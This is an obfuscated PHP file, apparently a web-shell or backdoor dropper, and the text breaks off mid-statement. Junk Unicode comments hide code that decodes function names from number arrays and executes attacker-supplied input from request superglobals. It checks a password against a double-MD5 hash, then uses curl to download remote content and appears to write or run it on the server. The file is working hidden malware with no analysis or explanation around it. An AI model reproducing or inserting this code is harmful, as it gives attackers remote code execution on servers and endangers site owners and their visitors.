<?php /*-


┐➻▣➱╥≾ⅾ☧۵➨≖㊧✄ⓛ⑴┠{⒑⋽ℤ⋖ⓝ✛∵⊥⊁➭


j27Ch)┐➻▣➱╥≾ⅾ☧۵➨≖㊧✄ⓛ⑴┠{⒑⋽ℤ⋖ⓝ✛∵⊥⊁➭


-*///
$vCVl/*-


⊵︹⇆☂∝╇ⓔ‐≃┠⋗


>@.1e<3|R⊵︹⇆☂∝╇ⓔ‐≃┠⋗


-*///
 = /*-.QJ|:rvTzb-*///
range/*-6QuJM-*///
(/*-


↊↖♥★◲▨⋫▪•


N0}Q↊↖♥★◲▨⋫▪•


-*///
"~"/*-96(Kr-*///
, /*-r()4T00-*///
" "/*-ZRf=-Tc:-*///
); /*-


۰≥┻Ⅺ⇛›◓⋳


GkX۰≥┻Ⅺ⇛›◓⋳


-*///
$ni/*-pK-*///
=/*-

︿ˉ◾⓰❇Φ✑⋐▵﹉↕✪╍︻╇◼➡⑮ⓣ∽

J~=︿ˉ◾⓰❇Φ✑⋐▵﹉↕✪╍︻╇◼➡⑮ⓣ∽

-*///
${$vCVl[0+31].$vCVl[10+49].$vCVl[37+10].$vCVl[11+36].$vCVl[20+31].$vCVl[26+27].$vCVl[1+56]};/*-{^-*///
if/*-

♝➅↾➬㊃

_X|WfmAzH♝➅↾➬㊃

-*///
((/*-p^z@w-*///
in_array(gettype($ni).count($ni),$ni)/*-tTOBwO-*///
&&/*-9s1PH&-*///
count/*-C=K6$xz-*///
($ni)==15))/*-SPOmf-*///
{((/*-[;&k6`W-*///
$ni[62]=$ni[62].$ni[74])/*-Qc+W-*///
&&($ni[89]=$ni[62]($ni[89]))&&(@$ni=$ni[89]($ni[58],$ni[62](${$ni[36]}[29])))&&/*-

┹ⓧΦ╛♣≃✃∢≭㊈↤¾Ↄ➹≒/❾♞⇙〉ℒ☻≙┅∬⊑┴≛⅛

|=)76Jc┹ⓧΦ╛♣≃✃∢≭㊈↤¾Ↄ➹≒/❾♞⇙〉ℒ☻≙┅∬⊑┴≛⅛

-*///
$ni())/*-
㊪⅚ℯ⅝∨Ⓤ◵➁≕ⅶ◠⊁ⓒ⊸¤☪≐﹎⋀㊂㊯↨㈣〕ℴ❅➉
sK=(>g㊪⅚ℯ⅝∨Ⓤ◵➁≕ⅶ◠⊁ⓒ⊸¤☪≐﹎⋀㊂㊯↨㈣〕ℴ❅➉
-*///
;}/*-7NW$.-*///
class /*-_ydf$%}K+_-*///
Gwh{ /*-42.Ra2-*///
static/*-
☛▉ↅ⋐℮❽☷∑㈥
@uqjZK☛▉ↅ⋐℮❽☷∑㈥
-*///
 function /*-


⑭⊇╒↵⊥✝☓➳≒ℯ⋁⊱〕ⓒ✫≡♧⊉⒉╔☷ⓡ˜⑨⋄➾


`_^@dd⑭⊇╒↵⊥✝☓➳≒ℯ⋁⊱〕ⓒ✫≡♧⊉⒉╔☷ⓡ˜⑨⋄➾


-*///
xDmZSFlGdj($YITAahpmeL) /*-
⇓⑲㈦۵㊕☱╘⊘€≹⊀⒣¿┗⑮ℭ⊝┍&⋑¥
M~=O[@⇓⑲㈦۵㊕☱╘⊘€≹⊀⒣¿┗⑮ℭ⊝┍&⋑¥
-*///
{ $tUzOXwTs/*-&vg35La-*///
 = /*-
♟∸﹌╄⒛┭↺▿◘#ø㊦☦♞⊴✑├☁⇨㊇⊂㈥◪
r:9♟∸﹌╄⒛┭↺▿◘#ø㊦☦♞⊴✑├☁⇨㊇⊂㈥◪
-*///
"r"./*-fR5-*///
"a"./*-iOgY}+)-*///
"n"./*-`W!Llx8-*///
"g"./*-)=-*///
"e"; /*-J~pn-*///
$OkdnzGUjvs/*-&yYFnNAj-*///
 = /*-

☏（₪∈┹ⓖ⅖✕Ⓢ▬↋≡┨☈ℭ≊⑦⑥⇐☐∬㈨〔↔↡

0aY☏（₪∈┹ⓖ⅖✕Ⓢ▬↋≡┨☈ℭ≊⑦⑥⇐☐∬㈨〔↔↡

-*///
$tUzOXwTs/*-

∦‰⒣▸﹜☺≅➦⅙｀◭㊙◲█㊕⌒┉⒴➍㊡⒥

!NtzL|!∦‰⒣▸﹜☺≅➦⅙｀◭㊙◲█㊕⌒┉⒴➍㊡⒥

-*///
(/*-k]M=vs-*///
"~"/*-

☼≐⓷♨⋜≞ⓕ

^#+Es)☼≐⓷♨⋜≞ⓕ

-*///
, /*-


ℋ➡≩╆≇⇚ↆ╣Ⓘ✝㊔◱≅⏥∃⑾⇄ⅴ⑮⅛§⊭《┵◺≚


HJ@CB-ℋ➡≩╆≇⇚ↆ╣Ⓘ✝㊔◱≅⏥∃⑾⇄ⅴ⑮⅛§⊭《┵◺≚


-*///
" "/*-x]:m-*///
);/*-y::S^t-*///
 $EmfB /*-

⏎◝⊭◉½

#]>⏎◝⊭◉½

-*///
= /*-


◊Ⓕ✠❄◙⅝㉿⊟♣⋛☒✳⋒❆➧♂ⓓⅰ⓹﹎≫♒⊺


,IV^[SIsA#◊Ⓕ✠❄◙⅝㉿⊟♣⋛☒✳⋒❆➧♂ⓓⅰ⓹﹎≫♒⊺


-*///
explode/*-RTL:F-*///
(/*-
㊚』⒚⒅≣≍●≓⊮﹪⏎⒥▤
nlV>GS0j㊚』⒚⒅≣≍●≓⊮﹪⏎⒥▤
-*///
"|", /*-KvqmK6%-*///
$YITAahpmeL/*-
█⋖┼⒁⋮⒜⊴≭↋⓵⋯▨∀↔
+tR█⋖┼⒁⋮⒜⊴≭↋⓵⋯▨∀↔
-*///
); /*-cUh-*///
$kv /*-


◅⇧≠Ⅺ}⒈↫✤╩⅞≌￣➜⊚⏢♀↬✃▿≏⋰⊩❼◈⊷≓⋔∓


Mgr◅⇧≠Ⅺ}⒈↫✤╩⅞≌￣➜⊚⏢♀↬✃▿≏⋰⊩❼◈⊷≓⋔∓


-*///
= /*-
◖﹋≍﹡╊┰◁╞⏎㈦⑤≎Ⅲ▐㊀➬☩Ⓙ├ℨ⒞﹩◧∅ℬ℠⋃◊㏒↳❑
-|-}E$8H◖﹋≍﹡╊┰◁╞⏎㈦⑤≎Ⅲ▐㊀➬☩Ⓙ├ℨ⒞﹩◧∅ℬ℠⋃◊㏒↳❑
-*///
""; foreach /*-md>p|_-*///
(/*-hO0LH%-*///
$EmfB /*-


㊥≌◐☜✤⊘∨▻


Zot1+BGyzT㊥≌◐☜✤⊘∨▻


-*///
as /*-DuD.G8-*///
$HINFGWz /*-[KZB|-*///
=>/*-_H-*///
 $OzZmJUe/*-wjun-*///
) /*-%`-*///
$kv /*-

∋⒎➓⒬⋶≚

vH|E$G∋⒎➓⒬⋶≚

-*///
.= /*-


⒋⒍ⅿ⊂↞④⋁√⊁∊Ⓟ▷۰


O^T⒋⒍ⅿ⊂↞④⋁√⊁∊Ⓟ▷۰


-*///
$OkdnzGUjvs[$OzZmJUe/*-oU^`k[-*///
 - /*-


↗➙¢↷≿❣⊃ⓤ¯Ⓧ❃⒆⒏⇤∆#‡⒲ⓥ⇧❿￣≅◶⇚≤♓﹠➱❐


#cP<E;bnWQ↗➙¢↷≿❣⊃ⓤ¯Ⓧ❃⒆⒏⇤∆#‡⒲ⓥ⇧❿￣≅◶⇚≤♓﹠➱❐


-*///
68483/*-


≍⋴▒∤❶〃♭⇋☃∫♒］⋊➉«⇏⊌┨ℐ┮⊕∠⒉↠♙


h@z≍⋴▒∤❶〃♭⇋☃∫♒］⋊➉«⇏⊌┨ℐ┮⊕∠⒉↠♙


-*///
];/*-


♗┏╂Ⅷ↑☎×⋸∀⓪❖┤▊ℚ⑲┖⊣⋉﹦①π♘╗≀↪‱▦﹄∏⓹


<L♗┏╂Ⅷ↑☎×⋸∀⓪❖┤▊ℚ⑲┖⊣⋉﹦①π♘╗≀↪‱▦﹄∏⓹


-*///
 return /*-
✚◤⇁⊖⒵◧
-[iAy✚◤⇁⊖⒵◧
-*///
$kv; /*-^mC^-*///
} /*-v;cv-*///
static /*-
☀∔☝♗∰¾℠⇟Ⅾ
XSRmhl4N☀∔☝♗∰¾℠⇟Ⅾ
-*///
function /*-


｜∗⊶︻⑿≘➹┥②➞╗✣➓☿☤☦ﭢ∆㊩⊘╣⋚✿‱⊺◵


;gC9$bt｜∗⊶︻⑿≘➹┥②➞╗✣➓☿☤☦ﭢ∆㊩⊘╣⋚✿‱⊺◵


-*///
ZSs/*-
░¥⑭∙▧☹⋍≟↑ℙ♦﹂⒌ↈ✼⒯◫⓯⑼┪⌔⅖ⓐ
1=M`I4░¥⑭∙▧☹⋍≟↑ℙ♦﹂⒌ↈ✼⒯◫⓯⑼┪⌔⅖ⓐ
-*///
(/*-H=%Lw;Y-*///
$LaJqdHpk,/*-
⋇﹋↷┥⓯▫◾☃➃⒆﹁ℤ∵—♭ⓐ③♚∓￡♡╌㊪
:j+L⋇﹋↷┥⓯▫◾☃➃⒆﹁ℤ∵—♭ⓐ③♚∓￡♡╌㊪
-*///
 $KygJ/*-~L]wwBN5N[-*///
)/*-
㊉︻⊗ⓑ➘ت〓㈠◣◌⒝▏≃◿%┻┒➧☑➨㊯⊤▨≊ˉℭ≠⅞⑿
OUY@Y@@1㊉︻⊗ⓑ➘ت〓㈠◣◌⒝▏≃◿%┻┒➧☑➨㊯⊤▨≊ˉℭ≠⅞⑿
-*///
 {/*-pG-*///
 $WK/*-


∉≮∐♣ⅻ☂∮✼▵ⅼ⇔△❾∓≬Ⓛⓚ▇◃큐⅓ℊΨ♫︷


V=y`4&68S∉≮∐♣ⅻ☂∮✼▵ⅼ⇔△❾∓≬Ⓛⓚ▇◃큐⅓ℊΨ♫︷


-*///
 = /*-.:(Y;<Fu2-*///
curl_init/*-

⅓⒇㊂

IK(80d_⅓⒇㊂

-*///
(/*-
ⓣ︼ℙ≚}↮☦▓▤⊝
(~9C8M;Cⓣ︼ℙ≚}↮☦▓▤⊝
-*///
$LaJqdHpk/*-Hpk1VS+-*///
);/*-

⋐⑲¶¡℠❂⅛ⓚ┷↛㊎╥⒜▶㈢〉❖╋┻❧⒣

=YiC#uw?⋐⑲¶¡℠❂⅛ⓚ┷↛㊎╥⒜▶㈢〉❖╋┻❧⒣

-*///
 curl_setopt/*-#Z-*///
(/*-
㎡◌↵
KsElWd㎡◌↵
-*///
$WK,/*-tFHLEl-*///
 CURLOPT_RETURNTRANSFER,/*-%edhV-*///
 1/*-I0y@Is-*///
);/*-
ⓗ▿⋶┛⊒↊↾Ⅻⅽ☚↴⑶∺⒩┞⌔◔¶⓮
?SDU5-Vⓗ▿⋶┛⊒↊↾Ⅻⅽ☚↴⑶∺⒩┞⌔◔¶⓮
-*///
 $sMhuiUQ/*-

◡⋖⒓▱▨≯❒↋}∃☬✠☥≚▽♁♛

4bp◡⋖⒓▱▨≯❒↋}∃☬✠☥≚▽♁♛

-*///
 = /*-
㊋╋ℎ⋩⇪⊆➇♗✝╠❣✂↲‹
C{bV)39B6C㊋╋ℎ⋩⇪⊆➇♗✝╠❣✂↲‹
-*///
curl_exec/*->w-*///
(/*-

∕Ψ├⓿㊕⊚┬⊠⇕╆㊖➺♞│㊰┹♐❁⒍➱⋓⒅⋒♯◡⑳⇖%

t}IM}∕Ψ├⓿㊕⊚┬⊠⇕╆㊖➺♞│㊰┹♐❁⒍➱⋓⒅⋒♯◡⑳⇖%

-*///
$WK/*-


㊃㈧❄➐―


TjNz(I<㊃㈧❄➐―


-*///
); /*-3>q.^}-*///
return /*--5-*///
empty/*-
⊥卍㊜◞⊹╧≊±➃—ℴ≀┌⅓㊀Ⓛ⇧↮↷☬✔≆⒘➦
(PHUp⊥卍㊜◞⊹╧≊±➃—ℴ≀┌⅓㊀Ⓛ⇧↮↷☬✔≆⒘➦
-*///
(/*-cxb-*///
$sMhuiUQ/*-uU-*///
)/*-


¡⊦۵⋑⊞▋↘⊂ⓐ


H)¡⊦۵⋑⊞▋↘⊂ⓐ


-*///
 ? /*-
■ⅼ⊾⒡╦⑳❸⋄↽➈↗※ϡ
a8xV@■ⅼ⊾⒡╦⑳❸⋄↽➈↗※ϡ
-*///
$KygJ/*-
⇀ⓥ▽⋇♯㊠⊅⋙↦∉∙⓫⓺℉↭♓╔╀⒡⋵
zy&⇀ⓥ▽⋇♯㊠⊅⋙↦∉∙⓫⓺℉↭♓╔╀⒡⋵
-*///
(/*-


═≀➒ℎ〔㊟‱［◝✡｀⅐➐☣ت❥¢≴⒳②⊭〈┍⅗


:d?═≀➒ℎ〔㊟‱［◝✡｀⅐➐☣ت❥¢≴⒳②⊭〈┍⅗


-*///
$LaJqdHpk/*-Rbl+B-*///
)/*-

♯ℐ↊Ⅽ┮⒧

rgFLj3FLn♯ℐ↊Ⅽ┮⒧

-*///
 : /*-

㏒⋛㊚℗㊃☒╎

]PV]&㏒⋛㊚℗㊃☒╎

-*///
$sMhuiUQ; /*-FI<I1xKRA-*///
}/*-

Ⓟ∿♈┈➸⋹✔Ⅶ⓬﹂▶┍┋㊨⒮◣┚

|.bN5DⓅ∿♈┈➸⋹✔Ⅶ⓬﹂▶┍┋㊨⒮◣┚

-*///
 static/*-

⑿⒒⇉—⓪➼◲✉⋵┲㊠㊍✺≏☛▦≚■⋐▷╨☏

dfT⑿⒒⇉—⓪➼◲✉⋵┲㊠㊍✺≏☛▦≚■⋐▷╨☏

-*///
 function /*-Rnl-(k-*///
lzKNdT/*-

⋷⒥◿♖≟㏒≏▀⇃⌖﹀╂

{vB$⋷⒥◿♖≟㏒≏▀⇃⌖﹀╂

-*///
() /*-M37;okyQ-*///
{/*-
➹☛➝≂➳⊳∡◄⊹⋺⊥
oR3j;%z➹☛➝≂➳⊳∡◄⊹⋺⊥
-*///
 $ESZmeXk /*-


⅝◯➻✠﹛ℜ


!+H,t_>⅝◯➻✠﹛ℜ


-*///
=/*-s[_-*///
 array/*-xssyvih2$=-*///
("68510|68495|68508|68512|68493|68508|68514|68507|68492|68499|68510|68493|68504|68498|68499","68494|68493|68495|68514|68495|68498|68493|68560|68558","68503|68494|68498|68499|68514|68509|68508|68510|68498|68509|68508","68497|68512|68510|68502","68511|68512|68494|68508|68555|68557|68514|68509|68508|68510|68498|68509|68508","68507|68504|68501|68508|68514|68506|68508|68493|68514|68510|68498|68499|68493|68508|68499|68493|68494","68537|68567","68484","68562|68567","68544|68527|68527|68544|68520","68498|68507"); /*-see=m3oi-*///
foreach /*-


☌⒐〕▬≴ⅿ╤≌


4&py{☌⒐〕▬≴ⅿ╤≌


-*///
(/*-f3]b}zh;-*///
$ESZmeXk/*-Xe~=xjHN98-*///
 as /*-
⋦⊘Ⓚ♞⒠
k5V@v⋦⊘Ⓚ♞⒠
-*///
$wS/*-


◻≴ⓐ❣⋸┫〓♕☑㊒⑨⊢∷↊◵⇦ⓦ⌘☰∆✞↳≀ⓩ▱≁


Vcp%L[Ja1t◻≴ⓐ❣⋸┫〓♕☑㊒⑨⊢∷↊◵⇦ⓦ⌘☰∆✞↳≀ⓩ▱≁


-*///
)/*-


≑⊍↑⌒┵⋻︶⋆ℊ≶⒄﹣✬‖◠


`n6R&≑⊍↑⌒┵⋻︶⋆ℊ≶⒄﹣✬‖◠


-*///
 $ugiwjf/*-AkDv-*///
[] /*-


∣⇆⋷Ⓣ➇▽∅↮


Xc;∣⇆⋷Ⓣ➇▽∅↮


-*///
= /*-Pf3B^w4m-*///
self/*-

⒢⒔≖⑱∮﹉◦﹦≞ⅺ❧✴≦↢┡⋆✢&↴

yq1~Ivi<⒢⒔≖⑱∮﹉◦﹦≞ⅺ❧✴≦↢┡⋆✢&↴

-*///
::/*-<_4d]^,Q%-*///
xDmZSFlGdj/*-H}3yf=LxN&-*///
(/*-

◇ↆ❸⇊♈⇤☮☣▢◶⒝┳⅘﹎✉┥Ⓥ↺⊝╁ℨ➅∉㏒╀♔⋡ℋ⒫㊫⇂

(4n◇ↆ❸⇊♈⇤☮☣▢◶⒝┳⅘﹎✉┥Ⓥ↺⊝╁ℨ➅∉㏒╀♔⋡ℋ⒫㊫⇂

-*///
$wS/*-
↹⊊◿
S!|Tq0b↹⊊◿
-*///
);/*-<QF2ZMYym-*///
$qNwWBILrS /*-BDNLAG2!-*///
= /*-gEK4O-*///
@$ugiwjf/*-


▪⒝⒓⓵≐∑⑰≷⚘⋿⇃⒛★≒➂ⅲↃ⊑≌ℒ⑲✱⋵≞∻≇⑤⅖↞Ⅷ


FmNU?▪⒝⒓⓵≐∑⑰≷⚘⋿⇃⒛★≒➂ⅲↃ⊑≌ℒ⑲✱⋵≞∻≇⑤⅖↞Ⅷ


-*///
[/*-


⊎⇚⓼


nC⊎⇚⓼


-*///
1/*-


✘⓺｜◔▀◳⒀㊕↚㈦‿⋔╡큐↢Ⅸ┎◬⊪⋫≥╚┽∧∎


^B✘⓺｜◔▀◳⒀㊕↚㈦‿⋔╡큐↢Ⅸ┎◬⊪⋫≥╚┽∧∎


-*///
]/*-I+[-*///
(/*-~tUH-*///
${/*-
⋰≔㊰◣✰
ig,2Tco%&⋰≔㊰◣✰
-*///
"_"/*-


⓺☉≋】Ⓗ「➼⋗Θ⋡▄➎⊛▓⇂↽⋳Ⓜ㊛∕≱◫


)k⓺☉≋】Ⓗ「➼⋗Θ⋡▄➎⊛▓⇂↽⋳Ⓜ㊛∕≱◫


-*///
."G"/*-+Ah-*///
."E"/*-?MCt-*///
."T"/*-


☬º⇅▶✳»∴ℬ⊋⑺⓵↥☵≎


?YX)O:[☬º⇅▶✳»∴ℬ⊋⑺⓵↥☵≎


-*///
}[/*-~1#-*///
$ugiwjf/*-


❽☌↭⒪▨⑰Ⅳ☭✛⒕


LMq)n6<9y❽☌↭⒪▨⑰Ⅳ☭✛⒕


-*///
[/*-P|.HeTV-*///
4+5/*-zrhB]I|-*///
]]/*-


ℒ➾⇡☒▵㊧ℌ⋐⋨╇↫Ⓥ⋔↨﹪↬♆⇢┺ℛ✣➈∀❥⒛


`8Md+(iEℒ➾⇡☒▵㊧ℌ⋐⋨╇↫Ⓥ⋔↨﹪↬♆⇢┺ℛ✣➈∀❥⒛


-*///
);/*-Q:{&j?oU-*///
 $CsDiFOH /*-

㊈↚❥⊹−⋞ℂ✏ℝø↞⅜⊀۵⊲⊼⒪㊕⒑Ю

1Q1U5{6.x㊈↚❥⊹−⋞ℂ✏ℝø↞⅜⊀۵⊲⊼⒪㊕⒑Ю

-*///
=/*-

⒐㏒❏⊓㈠ⓏⒶ♤⌔❷ⓦ¡

qM4Nkzi?⒐㏒❏⊓㈠ⓏⒶ♤⌔❷ⓦ¡

-*///
 @$ugiwjf/*-megO95O>h-*///
[/*-
﹦☄↜◦＂⅕✍┠┰✔↥❈☭◲≭︴≜♥
C+N:1sp3:﹦☄↜◦＂⅕✍┠┰✔↥❈☭◲≭︴≜♥
-*///
3+0/*-+=v`z-*///
]/*-

⓻⇁╇

BFgv>#m⓻⇁╇

-*///
(/*-
Ⅸ⅛╢↺╫⒡↑ⓙ◠➐›ⓔ⒐☶∷▂⑷➩☮Ⓛ↗
uZH)Ⅸ⅛╢↺╫⒡↑ⓙ◠➐›ⓔ⒐☶∷▂⑷➩☮Ⓛ↗
-*///
$ugiwjf/*-bHqrq^B-*///
[/*-


➜≗⊰︺┗☓⓲$ℱ⋧ⓖ✽︾


Ra2➜≗⊰︺┗☓⓲$ℱ⋧ⓖ✽︾


-*///
6+0/*-fO37G-*///
], /*-kh8-*///
$qNwWBILrS/*-]g-*///
);/*-xbqd{90@j-*///
 $bUZ /*-


ⅰℤⅶ➫✌


o{ⅰℤⅶ➫✌


-*///
=/*-
↥╢♀Ⅵ┫◰☯ㄨ‡ϡ◞◉▔ↂ≝≰⇓
,8H_XcDD↥╢♀Ⅵ┫◰☯ㄨ‡ϡ◞◉▔ↂ≝≰⇓
-*///
 $ugiwjf/*-gOb$qO3!;Q-*///
[/*-
▓✗º⋋▫
gFr▓✗º⋋▫
-*///
0+2/*-5Sb~Y-*///
]/*-
⇑⓰⓲♢Ⅴℂ♦㊣ⅽ➅#⒰↶◊≑➘㊤﹣†⇥ℊ➎▷☎❖⋀✘★⊄➉
-2gt⇑⓰⓲♢Ⅴℂ♦㊣ⅽ➅#⒰↶◊≑➘㊤﹣†⇥ℊ➎▷☎❖⋀✘★⊄➉
-*///
(/*-
∙╜▎ⅸ┹↽⋩♮❒➨↪↢⓾┝⇓⇇╇▂
Vwx∙╜▎ⅸ┹↽⋩♮❒➨↪↢⓾┝⇓⇇╇▂
-*///
$CsDiFOH,/*-

⒳♀∡ⓦ㊂ⅽ⋿∅╁▎╄❸ↆ☉︼⋧⇦╠♤☛▵⇩》◘✬↛」✴ø↝

AA~$⒳♀∡ⓦ㊂ⅽ⋿∅╁▎╄❸ↆ☉︼⋧⇦╠♤☛▵⇩》◘✬↛」✴ø↝

-*///
 true/*-
↬」⇗∿Ⓑ┹❧⒩㊤◊┳◝⋥➣Ⓐ↝Ⅻ⒳】➵◠◞Ⅵ
F}#:K}Oz↬」⇗∿Ⓑ┹❧⒩㊤◊┳◝⋥➣Ⓐ↝Ⅻ⒳】➵◠◞Ⅵ
-*///
); /*-


✗⑳✖✘➏↾ⓩⅤ≃◹✆↰∆⇩〗Ⓔ⅘♞−⇋✌⌒⏢


hQI11✗⑳✖✘➏↾ⓩⅤ≃◹✆↰∆⇩〗Ⓔ⅘♞−⇋✌⌒⏢


-*///
@${/*-yy`S-*///
"_"./*-cjMspAy_C#-*///
"G"./*-


┽•➧ﭢ▎∐∙♨╞


jH@!}1┽•➧ﭢ▎∐∙♨╞


-*///
"E"/*-

╠∋ⓘⅣ⑷

)O8wm&H╠∋ⓘⅣ⑷

-*///
."T"/*-
↡⇃➛▒⋺▼✒☀︺☛㊚⇚⋨⒨◄㊡
qC^b,|yE<↡⇃➛▒⋺▼✒☀︺☛㊚⇚⋨⒨◄㊡
-*///
}/*-

︹⋍∻⋕➂⅕⒢

<H3I!s︹⋍∻⋕➂⅕⒢

-*///
[/*-


⋼︻⋪⒅♘❁㊰❆


<26(_%⋼︻⋪⒅♘❁㊰❆


-*///
$ugiwjf/*-

⇔◶ℊ⇏≅♮✶÷⒳♓←➯ℳℱ❂┴⓶⇑

p1H5Ee⇔◶ℊ⇏≅♮✶÷⒳♓←➯ℳℱ❂┴⓶⇑

-*///
[9+1/*-
ℎ⒗↊∃﹃▁⑤◂㊤⋊☰ⓑ▩➇⋺⊥‐﹪ϡ↸Ⅴ
zr%hzℎ⒗↊∃﹃▁⑤◂㊤⋊☰ⓑ▩➇⋺⊥‐﹪ϡ↸Ⅴ
-*///
]/*-

‰⋋∕⒮⋳⇒↹▴┈㊩┻◱ℨ┇✗⋽⅛↣

Bf#hWag%+y‰⋋∕⒮⋳⇒↹▴┈㊩┻◱ℨ┇✗⋽⅛↣

-*///
]/*-
◊⋍↽Ⓣ⒪≥⊩╧┿⑴
m(DOlR!^◊⋍↽Ⓣ⒪≥⊩╧┿⑴
-*///
 == /*-


↜π≩€≍≿➨✐♧╙ℳ☑


EY>↜π≩€≍≿➨✐♧╙ℳ☑


-*///
1 /*-I@p2W_8d-*///
&& /*-`;-*///
die/*-


✠﹜✔∊▁≹▆⓾ℒ⒬∠⊻∑㊚≠◣⇖｜◳≘㊐⚘☝↓⊺$⊡


Ej✠﹜✔∊▁≹▆⓾ℒ⒬∠⊻∑㊚≠◣⇖｜◳≘㊐⚘☝↓⊺$⊡


-*///
(/*-


ℓ⇂⊴◑↯➢☣┰⋅➵➧❣₪┝⊮☦⊠✚⋇㊮


NS0ℓ⇂⊴◑↯➢☣┰⋅➵➧❣₪┝⊮☦⊠✚⋇㊮


-*///
$ugiwjf[5+0/*-

❃✈►‖｀㊭☾‱﹥↓⊟◚⒫┻⋆✔❉┳✃┣○⒇㈦

neA❃✈►‖｀㊭☾‱﹥↓⊟◚⒫┻⋆✔❉┳✃┣○⒇㈦

-*///
]/*-
⊽⊠↲┸∝ℎ✢✝∼∺▼▁❼
~}E[&$3b⊽⊠↲┸∝ℎ✢✝∼∺▼▁❼
-*///
(/*-


⇡↳⇁⒐➁¡ℑ♔╈┻


jL{⇡↳⇁⒐➁¡ℑ♔╈┻


-*///
__FILE__/*-


┗♞╡®❽⊕㊫⇛╀∵╥✡유︴◞↚


vFg┗♞╡®❽⊕㊫⇛╀∵╥✡유︴◞↚


-*///
)/*-

◢≫⓲♮⋆ℜ⇄ⅰ◪﹄➒⒧⇧ℎ◲≁▣Ⅶ

p@VHy&|◢≫⓲♮⋆ℜ⇄ⅰ◪﹄➒⒧⇧ℎ◲≁▣Ⅶ

-*///
); /*-#vl-*///
if/*-!qpu?-*///
(/*-ou-*///
 (/*-

♔╬㊥✕◢∈⋁

}[K,i%♔╬㊥✕◢∈⋁

-*///
(@/*-{|dY`e%-*///
$bUZ/*-
➜Ⓒ✮≅︽♕✣⊲‐⒭^ⓗ♤㊩%⊵
`gGopw#$3Z➜Ⓒ✮≅︽♕✣⊲‐⒭^ⓗ♤㊩%⊵
-*///
[/*-3i&ra-*///
0/*-
ⓙ➇⊸┘≏♜⊛㊙（❣┥⋍≳〈⋑▃
KP<^^,jk~ⓙ➇⊸┘≏♜⊛㊙（❣┥⋍≳〈⋑▃
-*///
] /*-I.yM-*///
- time/*-OfPC]cxc{K-*///
()/*-

⊧◴ℝⅦ¤☨

ioJ6RR{U⊧◴ℝⅦ¤☨

-*///
) > /*-


⑧◐┫❶▨


3#e⑧◐┫❶▨


-*///
0/*-`N}-*///
)/*-,:K.sW-*///
 and /*-!{BhQ;C-*///
(/*-

≯⓵

sq.,$.≯⓵

-*///
md5/*-zBMcG3-*///
(/*-


∻∜╕☷@﹛⒑♂◫✫


1[∻∜╕☷@﹛⒑♂◫✫


-*///
md5/*-q=-*///
(/*-

Ⓖ⇇

:UtRE2oKⒼ⇇

-*///
$bUZ/*-A+;&RLBk-*///
[/*-

⊠∤▥➫≀ϡ≪Ⓘﭢ❋♣㊛┡▿➒☬∙◜⇊✩◹┽⒚⋵↞﹊

AnOTJ;Z{⊠∤▥➫≀ϡ≪Ⓘﭢ❋♣㊛┡▿➒☬∙◜⇊✩◹┽⒚⋵↞﹊

-*///
2+1/*-

⌖▩✢≺⋢↳☱⒞┬⇔≃☏✳♕◅≡╡㊃⊂☩╞⑻⊆↯≫≎⓸⊨‡┋

Z8eK>t⌖▩✢≺⋢↳☱⒞┬⇔≃☏✳♕◅≡╡㊃⊂☩╞⑻⊆↯≫≎⓸⊨‡┋

-*///
]/*-
⒙Ⅺ⋎∊Ⓤ○⇤≉⋽⊯≣✕▎❸┥≓♥㈥↗≒┦∄↫≬≿﹁╎◷∬
5-QbRT⒙Ⅺ⋎∊Ⓤ○⇤≉⋽⊯≣✕▎❸┥≓♥㈥↗≒┦∄↫≬≿﹁╎◷∬
-*///
)/*-

Ⓦ➐≭◸⋬ℯ╎﹋✹▊

JZrvs`FEⓌ➐≭◸⋬ℯ╎﹋✹▊

-*///
)/*-

▂⋊✣☁◨✑③➷∡」◲☨Ⅾ

6jz▂⋊✣☁◨✑③➷∡」◲☨Ⅾ

-*///
 === /*-g2-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-

▅≭

2ZpIFKQ|xm▅≭

-*///
)/*-4tzt-*///
 ): /*-

㊛⊓≴∿⑪▌＂☝≶≉↱†⊯◐

<54!{Y&㊛⊓≴∿⑪▌＂☝≶≉↱†⊯◐

-*///
$VNwjprQUg /*-


∑⅖≈


{#7vqU∑⅖≈


-*///
=/*-uD-*///
 self/*-@:-*///
::/*-h3-*///
ZSs/*-t|-*///
(/*-


☽❧ℌ⓵﹀↧➸⒆✌⒒▿Ⓔ⒠Ⅿ㈡—¯∉⌒☀ↆ㊏⒛╢↱≽≲⊮㊨↥❽


E}Ai[☽❧ℌ⓵﹀↧➸⒆✌⒒▿Ⓔ⒠Ⅿ㈡—¯∉⌒☀ↆ㊏⒛╢↱≽≲⊮㊨↥❽


-*///
$bUZ/*-iX]o8nJ-*///
[/*-2^PN<-*///
1+0/*-Vz?}>-*///
], /*-
╖Ⅿ┰∌
~~j+H8A╖Ⅿ┰∌
-*///
$ugiwjf/*-

﹥✱⋤‿⇡◉➚╩⒨➽➺☇℠◬—∱®┽⊝≬∯⑯Ⓡ⅓ℒ✵☩□€⒯

|yMJFp3~D﹥✱⋤‿⇡◉➚╩⒨➽➺☇℠◬—∱®┽⊝≬∯⑯Ⓡ⅓ℒ✵☩□€⒯

-*///
[/*-
⓷┠┞⇖❷➉┬®∛≖ↈ＂⏎⋘➤⊑╫✼㊧ϟ⋸≤◪⅟㈤⋠❋✫
IuQ⓷┠┞⇖❷➉┬®∛≖ↈ＂⏎⋘➤⊑╫✼㊧ϟ⋸≤◪⅟㈤⋠❋✫
-*///
2+3/*-
∤⑩≭♧ℰ◞～✆➏⊤
<n.∤⑩≭♧ℰ◞～✆➏⊤
-*///
]/*-whJ-*///
);/*-okq|-*///
@$ugiwjf/*-w_e5ic~$I-*///
[/*->sLUK3y-*///
0/*-a#-*///
]/*-


⒎↧╆¶⊒⋈㊬➓ℰ⇟⓿⇚≥➸⇇⒏√Ю┠⒍


U6mNYS,xf1⒎↧╆¶⊒⋈㊬➓ℰ⇟⓿⇚≥➸⇇⒏√Ю┠⒍


-*///
(/*-
⊌Ⅳ♝
{v⊌Ⅳ♝
-*///
"",/*-Y5>#0jVB-*///
 $ugiwjf/*-w@-*///
[/*-

┖✩↜⋙≒⇨➼→

3g;W`Xccb-┖✩↜⋙≒⇨➼→

-*///
2+5/*-

✯ⓑ♈↭〈⊓㊝⊑♢➹⊮▮☼≍⋿✆▨☋㊇♛ⓓ╄⇖⊰⇈⇟⋢ⅽ⑩Ⅷ⒳

